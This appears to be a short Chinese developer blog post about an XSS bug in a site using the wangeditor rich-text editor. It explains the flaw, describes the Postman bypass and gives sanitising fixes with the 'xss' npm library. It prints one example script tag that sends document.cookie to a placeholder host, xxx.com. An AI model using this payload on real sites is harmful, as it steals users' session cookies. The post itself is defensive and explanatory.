bug-xss 攻击漏洞问题

XSS 攻击漏洞是什么

XSS(Cross-Site Scripting)攻击:通过在网站上植入恶意脚本来攻击用户

举例说明

在留言板发布评论,评论内容包含恶意脚本:

javascript 复制代码
<script>document.location = "http://xxx.com/getCookie?cookie=" + document.cookie;</script>

当用户看到评论时,就会触发响应,将用户cookie发送到攻击者手中

问题描述

前端使用wangeditor富文本编辑器,正常情况下编辑器都会把内容进行转码处理,转码之后就回避xss问题,这次的问题是通过一些手段提及内容(比如postman),这样提交的代码就没有经过编辑器进行转码,读取数据时就会触发恶意代码。

解决方法

  1. 方法一:后端拿到数据后,再进行一次转码,保障进入数据库的内容是转码后的;
  2. 方法二:读取后端数据后,对要展示的数据再进行一次转码,相当于保存和读取都进行转码。

转码工具

https://jsxss.com/zh/index.html

javascript 复制代码
// 安装
npm i xss
// 引用
import filterXSS from 'xss'
const newStr=filterXSS(htmlStr); // 进行转码
相关推荐
余人于RenYu2 小时前
Claude + Figma MCP
前端·ui·ai·figma
杨艺韬5 小时前
vite内核解析-第2章 架构总览
前端·vite
我是伪码农6 小时前
外卖餐具智能推荐
linux·服务器·前端
2401_885885046 小时前
营销推广短信接口集成:结合营销策略实现的API接口动态变量填充方案
前端·python
小李子呢02116 小时前
前端八股性能优化(2)---回流(重排)和重绘
前端·javascript
程序员buddha7 小时前
深入理解ES6 Promise
前端·ecmascript·es6
吴声子夜歌7 小时前
ES6——Module详解
前端·ecmascript·es6
剪刀石头布啊7 小时前
原生form发起表单干了啥
前端
剪刀石头布啊7 小时前
表单校验场景,如何实现页面滚动到报错位置
前端
gyx_这个杀手不太冷静7 小时前
大人工智能时代下前端界面全新开发模式的思考(二)
前端·架构·ai编程